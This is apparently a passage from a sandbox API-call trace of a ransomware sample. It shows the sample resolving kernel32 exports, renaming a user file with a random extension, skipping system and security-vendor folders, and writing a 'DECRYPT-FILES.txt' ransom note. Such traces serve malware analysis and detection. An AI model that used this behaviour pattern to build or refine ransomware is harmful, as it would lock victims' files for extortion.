lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.462] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.462] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.462] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.462] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.463] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.463] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.463] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.463] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.463] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.463] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.463] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.463] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.463] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.463] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.463] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.463] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.463] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.463] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.463] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.463] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.463] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.463] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.463] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.463] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.464] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.464] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.464] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.464] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.464] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.464] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.464] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.464] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.464] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.464] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.464] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.464] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.464] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.464] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.464] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.464] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.464] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.464] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.464] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.465] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.465] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.465] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.465] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.465] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.465] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.465] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.465] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.465] lstrlenA (lpString="DELETEATOM") returned 10 [0078.465] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.465] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.465] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.465] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.465] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.465] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.465] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.465] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.465] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.465] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.465] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.466] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.466] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.466] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.466] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.466] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.466] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.466] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.466] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.466] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.466] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.466] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.466] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.466] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.466] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.466] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.466] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.466] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.466] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.466] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.466] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.467] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.467] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.467] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.467] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.467] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.467] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.467] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.467] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.467] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.467] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.467] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.467] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.467] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.467] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.467] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.467] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.467] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.468] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.468] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 72 [0078.468] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.EOKT") returned 77 [0078.468] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.EOKT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist.eokt"), dwFlags=0x0) returned 1 [0078.469] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.469] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.469] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.469] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x2b1e4b40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b1e4b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x36031920, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 0 [0078.469] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0078.469] CloseHandle (hObject=0x448) returned 1 [0078.470] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43bcc750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x43bcc750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x43bcc750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0078.470] lstrcmpW (lpString1="Publisher", lpString2=".") returned 1 [0078.470] lstrcmpW (lpString1="Publisher", lpString2="..") returned 1 [0078.470] lstrcatW (in: lpString1="Publisher", lpString2="\\" | out: lpString1="Publisher\\") returned="Publisher\\" [0078.470] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Publisher\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\" [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\Program Files") returned 0x0 [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch=":\\Windows") returned 0x0 [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\Games\\") returned 0x0 [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\All Users") returned 0x0 [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="AhnLab") returned 0x0 [0078.470] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.470] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned 66 [0078.470] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.470] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\\\jkbimi8.tmp") returned 78 [0078.470] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0078.472] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned 66 [0078.472] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.472] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\\\DECRYPT-FILES.txt") returned 84 [0078.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0078.472] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0078.473] CloseHandle (hObject=0x44c) returned 1 [0078.474] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned 66 [0078.474] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\*" [0078.474] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, 